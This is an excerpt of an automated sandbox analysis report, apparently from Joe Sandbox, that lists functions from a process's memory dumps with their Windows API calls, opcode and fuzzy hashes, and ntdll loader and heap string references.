Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418620 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418500 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 004184F2 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2f39714a28864dab9e53435d042908a98bd1cdb96719eb927bf4fd5f6fba28c6
Instruction ID: 744546a20a163fe83419cecf161a1ffbccf56dc5d42d2f42297ab6f1da78864d
Opcode Fuzzy Hash: 2f39714a28864dab9e53435d042908a98bd1cdb96719eb927bf4fd5f6fba28c6
Instruction Fuzzy Hash: A9D0A7715003007ED621DF248CC5FD773689F54344F10855DB6282F241C936E7108AE4

Uniqueness

Uniqueness Score: -1.00%

Function 01762C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762C24

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
Instruction ID: 5fb6751b7ade4547c1a463c2ba43b53395e6f5b85dd39afc6bceeb6f3afdd017
Opcode Fuzzy Hash: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
Instruction Fuzzy Hash: 86B09B719055C5C9DF52F764460C717B90477D0701F16C071D6030651F4738C1D1E276

Uniqueness

Uniqueness Score: -1.00%

Function 0041861C Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_1.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c6bce7e31e79f8b0a64ac7f908781f6e826d0a82dcabac7758a78cc2bc07ea57
Instruction ID: a1b5db0562189df302a18628dd1af52c53b39aa79dbd7d611ba4bfd3c7aad99a
Opcode Fuzzy Hash: c6bce7e31e79f8b0a64ac7f908781f6e826d0a82dcabac7758a78cc2bc07ea57
Instruction Fuzzy Hash: 0CA0027617511C586836B2A57C04CFE5E4DC9C426A745869FF10C80D111A1B847801A4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 017A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

TracingFlags, xrefs: 017A2549
MaxLoaderThreads, xrefs: 017A24EC
UnloadEventTraceDepth, xrefs: 017A24C0
ExecuteOptions, xrefs: 017A25A0
GlobalFlag, xrefs: 017A2F3F, 017A3059
DisableExceptionChainValidation, xrefs: 017A275F
Initializing the application verifier package failed with status 0x%08lx, xrefs: 017A3176
ShutdownFlags, xrefs: 017A24A1
CFGOptions, xrefs: 017A2967
@, xrefs: 017A2942
DisableHeapLookaside, xrefs: 017A246D
LdrpInitializeExecutionOptions, xrefs: 017A317D
MinimumStackCommitInBytes, xrefs: 017A2BB0
MaxDeadActivationContexts, xrefs: 017A2D82
@, xrefs: 017A2B74
FrontEndHeapDebugOptions, xrefs: 017A2489
GlobalFlag2, xrefs: 017A2FC0
UseImpersonatedDeviceMap, xrefs: 017A251C
RaiseExceptionOnPossibleDeadlock, xrefs: 017A2579
minkernel\ntdll\ldrinit.c, xrefs: 017A3187

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
Instruction ID: b05875a2a1c3661bfa0dce776f2dfb8ca35786420657c314be24f075a91f212e
Opcode Fuzzy Hash: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
Instruction Fuzzy Hash: 4A926C71608342AFE721DF28C884B6BF7E8BB84754F444A2DFA94D7252D770E944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01758620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
Critical section debug info address, xrefs: 0179541F, 0179552E
Invalid debug info address of this critical section, xrefs: 017954B6
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
Thread identifier, xrefs: 0179553A
Critical section address., xrefs: 01795502
corrupted critical section, xrefs: 017954C2
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
8, xrefs: 017952E3
double initialized or corrupted critical section, xrefs: 01795508
undeleted critical section in freed memory, xrefs: 0179542B
Critical section address, xrefs: 01795425, 017954BC, 01795534
Thread is in a state in which it cannot own a critical section, xrefs: 01795543
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
Instruction ID: 059fa58a12d8bf5706f9680aeb64cb80ed48328f530afd5896dd40283c1ae5c8
Opcode Fuzzy Hash: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
Instruction Fuzzy Hash: 00819DB1A00358EFEF21CF99C855BAEFBF5AB48704F20415AF904B7291D3B1A944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 017529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
@, xrefs: 0179259B
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
Instruction ID: 0a73871d438f389c10f4cfa477aae95a6dade5123237f3d52e2e0798a1bf7c0e
Opcode Fuzzy Hash: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
Instruction Fuzzy Hash: 950271F1D042299BDF61DB54CC84BD9F7B8AB54304F4041DAEA49A7243EB70AE84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 017C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

SegmentHeap, xrefs: 017C8BE9
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 017C8BD0
csrss.exe, xrefs: 017C8B80
DefaultBrowser_NOPUBLISHERID, xrefs: 017C8D00
lsass.exe, xrefs: 017C8BA1
heapType, xrefs: 017C8BCB
smss.exe, xrefs: 017C8B8B
svchost.exe, xrefs: 017C8B68
services.exe, xrefs: 017C8B96
runtimebroker.exe, xrefs: 017C8B73

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
Instruction ID: 424885e97c3c6c5f589febec666c91ea01141018966b81f570c3032aa60b7966
Opcode Fuzzy Hash: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
Instruction Fuzzy Hash: 9A51BD715143119BD339CF288844BABFBECEF98B50F14496DEA9AC3245E770D644CB92

Uniqueness

Uniqueness Score: -1.00%

Function 017D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 017D03BA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 017D069F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 017D04D3
Just reallocated block at %p to %Ix bytes, xrefs: 017D05F1
RtlReAllocateHeap, xrefs: 017D02BF, 017D0362
HEAP: , xrefs: 017D03A6, 017D04B5, 017D05DD, 017D0682, 017D06D9
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 017D06EA
HEAP[%wZ]: , xrefs: 017D0399, 017D04A8, 017D05D0, 017D0675, 017D06CC

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
Instruction ID: cd869c5d9dd4107611c4cd77b53a878a05802e1bcba8382563e1e070b6d1ba20
Opcode Fuzzy Hash: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
Instruction Fuzzy Hash: 7BD1CA3560068ADFDB22DFACC444AAEFBF2FF4A710F189059F9469B256C7349981CB10

Uniqueness

Uniqueness Score: -1.00%

Function 017A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierDebug, xrefs: 017A8CA5
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
HandleTraces, xrefs: 017A8C8F
VerifierDlls, xrefs: 017A8CBD
VerifierFlags, xrefs: 017A8C50
AVRF: -*- final list of providers -*- , xrefs: 017A8B8F

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
Instruction ID: 54ca0973da4dbd26530540bdd30b5d7449d9a542f89f09b45a5b7129c684307f
Opcode Fuzzy Hash: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
Instruction Fuzzy Hash: 25915873641302EFD721EF68C894B5BF7E8ABD9B15F840658FA41AB244C7709E40CB92

Uniqueness

Uniqueness Score: -1.00%

Function 017563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 01794258
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 017941FE
Process initialization failed with status 0x%08lx, xrefs: 0179413A
_LdrpInitialize, xrefs: 017940DF, 01794141, 01794205, 0179425F
minkernel\ntdll\ldrinit.c, xrefs: 017940E9, 0179414B, 0179420F, 01794269
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 017940D8

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
Instruction ID: 0c3004847f5ce77fa99c7647d61851295e718d9af79cd1004b30111cf45f3676
Opcode Fuzzy Hash: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
Instruction Fuzzy Hash: F2916C72B403169BDF35DF58E948BAAFBA5FB41B24F500168FE0167289D7B05A42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0171645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01716496
LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
Instruction ID: a54c2a807c0ad568638060b8763c4b4af067afce1b187b9850018621e5a01c14
Opcode Fuzzy Hash: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
Instruction Fuzzy Hash: 66510572209301DFDB21EF28C845BABF7E8FB84658F10091DFA8597165DB70EA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01752674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180
RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
SXS: %s() passed the empty activation context, xrefs: 01792165
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
Instruction ID: a7bde55655de706103a5b837f173892afdf5502bd6b97fe86b492da32719a91f
Opcode Fuzzy Hash: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
Instruction Fuzzy Hash: 8F3139B6B80315F7EB21DA999C85F5FFAB8DB65A40F050059FB0467286D3B0AE00C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 0175C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
Loading import redirection DLL: '%wZ', xrefs: 01798170
Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5
minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
LdrpInitializeProcess, xrefs: 0175C6C4

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
Instruction ID: 50efeb5e8ee26ef1f24b5f1832fc7f1c6d9860322028828615439413e4f0ac64
Opcode Fuzzy Hash: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
Instruction Fuzzy Hash: C531E4B26443069FD321EF28DC49E2AF7D8EF95B10F04055CF941AB299D660ED04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0176096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
Instruction ID: 298e506122e2ef465eef6cce5443ef1fa643323b92a149b412061e71f0bca7f6
Opcode Fuzzy Hash: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
Instruction Fuzzy Hash: 6B425D71900715DFDB61CF28C884BAAB7F9FF48314F1445AAE989DB245E770AA84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0172A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 0172A3EF
LdrResFallbackLangList Exit, xrefs: 0172A3FF
8, xrefs: 0172A3E7
6, xrefs: 0172A3F7

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
Instruction ID: e1442fb5502c17571284663e9498bc16824eb895af2569cec115048c909ad4cc
Opcode Fuzzy Hash: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
Instruction Fuzzy Hash: F7C1BA70108392CFD721DF59C144B6AFBE4FF94304F0489AAF9968BA51E334CA4ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 01758402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 01758591
LdrpInitializeProcess, xrefs: 01758422
minkernel\ntdll\ldrinit.c, xrefs: 01758421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
Instruction ID: 7253cf5f8024ebf96f597e524b6814d57b616e56a7f8f0c414ea0cbde554013c
Opcode Fuzzy Hash: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
Instruction Fuzzy Hash: D6919B71548345AFDB62DF26CC44FABFAECFB84684F40092EFA8896155E770D9048B63

Uniqueness

Uniqueness Score: -1.00%

Function 0175273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 017921DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
.Local, xrefs: 017528D8

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
Instruction ID: fd250eb193926f936f7e31ca75b53a53e3bbd56c612242a5179b674cff0fc357
Opcode Fuzzy Hash: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
Instruction Fuzzy Hash: A2A1BE31944229DBDB65DF68D888BA9F7B0BF58314F2501E9DD08AB352D7709E84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01754AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437
RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456

Memory Dump Source

